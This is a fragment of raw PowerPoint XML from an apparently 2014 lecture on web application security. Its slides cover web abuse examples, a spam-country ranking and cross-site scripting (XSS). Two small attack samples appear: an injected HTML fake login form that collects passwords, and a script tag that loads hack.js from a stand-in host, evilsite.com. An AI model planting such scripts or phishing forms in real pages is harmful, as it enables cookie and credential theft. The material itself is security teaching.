                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385037" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Abusing Web Applications: Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1027224374"/>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5033" name="Picture 9" descr="malwares_exploits_xss_acunetix_0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62000" y="1600200"/>
            <a:ext cx="7772400" cy="382905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11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385037" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Abusing Web Applications: Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2721378429"/>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5034" name="Picture 10" descr="malwares_exploits_xss_acunetix_0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62000" y="1600200"/>
            <a:ext cx="7772400" cy="382905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11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385037" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Abusing Web Applications: Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="429134064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The 10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Worst</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Spam</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Countries</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="0"/>
            <a:ext cx="5527343" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6464476" y="4432124"/>
            <a:ext cx="3839513" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Spamhaus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Blocklist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> (BSL) database</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.spamhaus.org/statistics/countries/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C270C27E-8536-9149-9DA9-3AFF6BC96CEE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5041582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5035" name="Picture 11" descr="malwares_exploits_xss_acunetix_0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62000" y="1600200"/>
            <a:ext cx="7772400" cy="382905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11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385037" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Abusing Web Applications: Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3369943280"/>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5036" name="Picture 12" descr="malwares_exploits_xss_acunetix_0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62000" y="1600200"/>
            <a:ext cx="7772400" cy="3829050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385037" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Abusing Web Applications: Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385038" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="5562600"/>
            <a:ext cx="8610600" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="25000"/>
              <a:lumOff val="75000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
          <a:extLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&gt;Please login with the form below before proceeding:&lt;form action="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>destination.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>"&gt;&lt;table&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&gt;&lt;td&gt;Login:&lt;/td&gt;&lt;td&gt;&lt;input type=text length=20 name=login&gt;&lt;/td&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&gt;&lt;td&gt;Password:&lt;/td&gt;&lt;td&gt;&lt;input type=text length=20 name=password&gt;&lt;/td&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&gt;&lt;/table&gt;&lt;input type=submit value=LOGIN&gt;&lt;/form&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1926745228"/>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smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387074" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387075" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site consists in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inserting a script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> into a web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>page</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often, the script itself is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>located on an other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example &lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.evilsite.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hack.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dangers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session redirecting (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>on a copy of the original website</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Display </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>fake </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>information or forms </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to collect data (phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Corrupt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
